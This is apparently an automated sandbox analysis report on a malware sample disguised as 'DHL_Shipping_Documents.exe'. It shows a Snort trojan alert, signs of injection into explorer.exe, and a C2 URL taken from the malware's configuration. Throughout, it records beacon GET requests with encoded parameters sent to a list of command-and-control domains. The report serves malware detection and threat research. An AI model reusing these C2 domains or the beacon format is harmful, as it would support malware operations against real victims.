Source:	Binary string: wntdll.pdbUGP source: DHL_Shipping_Documents.exe, 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1038676921.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1040268169.0000000004F97000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL_Shipping_Documents.exe, DHL_Shipping_Documents.exe, 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1038676921.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1040268169.0000000004F97000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rrFf.pdb source: DHL_Shipping_Documents.exe
Source:	Binary string: explorer.pdb source: DHL_Shipping_Documents.exe, 00000002.00000002.1039297463.0000000003170000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3437321702.0000000000560000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rrFf.pdbSHA256Z source: DHL_Shipping_Documents.exe

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 4x nop then pop edi		2_2_00416CCF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop edi		4_2_030D6CCF

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 194.180.49.211:80 -> 192.168.2.3:49713

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.withscreamandsugar.com/cy12/

Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=AWifNKmTatuMNjFWmVUMut82F+R0L3KA9BQ0BXxjmKOLRe1MZCqDC4tODwDaSipR9IdQ&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.modestswimwearshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=BBvyp039BsiOmjXcA5Ca/67av2dim7wwRTlzlMYtyQde9IIm1L0K7Q1DYQ9I6Egj/rZO&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.com-safe.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=S+XgLZqtN5ZrcTzEH0nKIqDU9JEn3YyIEzS4ZMIyK+eZCzdhhaAxeSNoAuyrfH+cd4vM&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.elfiensclinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=3ygVfBIa0HGiFlfKyaMrueuajYyskdaeFhTv94TMZpq88FBTarjLVZY/KKLUVTjfM/60&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.ssongg3132.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=7lHQpdK6TkflL8F8jBh9ujCCw+Z4C/llZEJLsHo9QOc6XtJTCIRu+iorXSY5XXoPERW4&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.xv1lz.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=iyef6EjVDd/dvjgrsxJwH1FkI7yMzM3jQxJ7rAziOaY8j1mxZQA+oVnGNKxpGmfMvyVL&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.ungravity.devConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=8ffpABDRKHDHAf13ISyYk2Bezqt16eZbRMX7TrFKwtVzHuBqZwyD4rylxhwg/kMizB1s&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.pmugly.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=8ffpABDRKHDHAf13ISyYk2Bezqt16eZbRMX7TrFKwtVzHuBqZwyD4rylxhwg/kMizB1s&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.pmugly.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

Network traffic detected: HTTP traffic on port 49688 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Sep 2023 11:31:17 GMTContent-Type: application/json; charset=utf-8Content-Length: 173Connection: closevary: Originaccess-control-allow-origin: *CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W3Z5F1k%2FZU6wc71M3fs38qYq6eYHjNJSGcnGPLLjhwKhDNUNQeNSchyWV6osogeSdeBx5ku%2BMOn0sGqMDkdprAPR39XUOLLa0gt45LtZbLA0j5GP4T81GHfnnRIoP31CV%2Fm0%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 80684d7dcfc128f4-LAXalt-svc: h3=":443"; ma=86400Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 52 6f 75 74 65 20 47 45 54 3a 2f 63 79 31 32 2f 3f 41 76 43 78 6e 74 3d 42 42 76 79 70 30 33 39 42 73 69 4f 6d 6a 58 63 41 35 43 61 2f 36 37 61 76 32 64 69 6d 37 77 77 52 54 6c 7a 6c 4d 59 74 79 51 64 65 39 49 49 6d 31 4c 30 4b 37 51 31 44 59 51 39 49 36 45 67 6a 2f 72 5a 4f 26 6f 66 75 74 5f 6c 3d 75 36 41 70 30 74 55 50 57 56 32 30 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 7d Data Ascii: {"message":"Route GET:/cy12/?AvCxnt=BBvyp039BsiOmjXcA5Ca/67av2dim7wwRTlzlMYtyQde9IIm1L0K7Q1DYQ9I6Egj/rZO&ofut_l=u6Ap0tUPWV20 not found","error":"Not Found","statusCode":404}

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 14 Sep 2023 11:34:12 GMTContent-Length: 1605Content-Type: text/html; charset=gb2312ETag: "b8154d4ffb24e0fd"Last-Modified: Thu, 14 Sep 2023 11:34:12 GMTVary: Accept-EncodingContent-Encoding: gzipConnection: keep-aliveData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e cf db 45 99 be 5b 94 cb e6 b3 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee ee 3e 7c f8 f0 ee 3b b4 f9 e8 e8 37 4e 1e cf f3 6c 86 9f cd b4 2e 56 ed d1 ac 9a ae 17 f9 b2 1d b7 45 5b e6 9f 7d fc 8f ff f7 ff da 2f fb 17 ff ad 7f e8 6f ff 47 fe d1 bf f7 6f fc 97 ff ca bf f7 6f fc bb ff b2 7f f5 5f fa 17 ff 83 bf fb af fd 67 ff 81 8f 0f 1f df d5 97 e8 75 6e 7e f4 0b 7f fc e0 e0 70 d3 3f f7 ef df a3 1f 7b 3b 3b bb fc 73 6f ef d3 87 f2 f7 0e Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~\|?"E[mzt/>\|;7Nl.VE[}/oGoo_gun~p?{;;so
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 14 Sep 2023 11:34:12 GMTContent-Length: 1605Content-Type: text/html; charset=gb2312ETag: "b8154d4ffb24e0fd"Last-Modified: Thu, 14 Sep 2023 11:34:12 GMTVary: Accept-EncodingContent-Encoding: gzipConnection: keep-aliveData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e cf db 45 99 be 5b 94 cb e6 b3 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee ee 3e 7c f8 f0 ee 3b b4 f9 e8 e8 37 4e 1e cf f3 6c 86 9f cd b4 2e 56 ed d1 ac 9a ae 17 f9 b2 1d b7 45 5b e6 9f 7d fc 8f ff f7 ff da 2f fb 17 ff ad 7f e8 6f ff 47 fe d1 bf f7 6f fc 97 ff ca bf f7 6f fc bb ff b2 7f f5 5f fa 17 ff 83 bf fb af fd 67 ff 81 8f 0f 1f df d5 97 e8 75 6e 7e f4 0b 7f fc e0 e0 70 d3 3f f7 ef df a3 1f 7b 3b 3b bb fc 73 6f ef d3 87 f2 f7 0e Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~\|?"E[mzt/>\|;7Nl.VE[}/oGoo_gun~p?{;;so

Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95

Source: explorer.exe, 00000003.00000000.997585045.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.998701663.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3449753491.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2776858139.0000000007207000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3218663416.0000000007217000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.998701663.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3444930072.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3180696588.0000000007217000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777169252.0000000007217000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000003.00000000.997585045.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.998701663.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3449753491.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2776858139.0000000007207000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3218663416.0000000007217000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.998701663.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3444930072.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3180696588.0000000007217000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777169252.0000000007217000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000003.00000000.998701663.00000000093F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3449753491.00000000093F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000003.00000000.998701663.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3449753491.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.998701663.00000000093C3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000003.00000002.3447563025.0000000007760000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.994763646.0000000002BD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.998053191.0000000007770000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.com-safe.site
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.com-safe.site/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.com-safe.site/cy12/www.elfiensclinic.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.com-safe.siteReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elfiensclinic.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elfiensclinic.com/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elfiensclinic.com/cy12/www.kslgd.link
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elfiensclinic.comReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaasmantech.net
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaasmantech.net/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaasmantech.net/cy12/www.yourdesignneed.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaasmantech.netReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hamidconstruction.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hamidconstruction.com/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hamidconstruction.com/cy12/www.xcolpuj.xyz
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hamidconstruction.comReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jhaganjr.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jhaganjr.com/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jhaganjr.com/cy12/www.gaasmantech.net
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jhaganjr.comReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kslgd.link
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kslgd.link/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kslgd.link/cy12/www.ssongg3132.cfd
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kslgd.linkReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.modestswimwearshop.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.modestswimwearshop.com/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.modestswimwearshop.com/cy12/www.com-safe.site
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.modestswimwearshop.comReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pmugly.top
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pmugly.top/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pmugly.top/cy12/www.jhaganjr.com
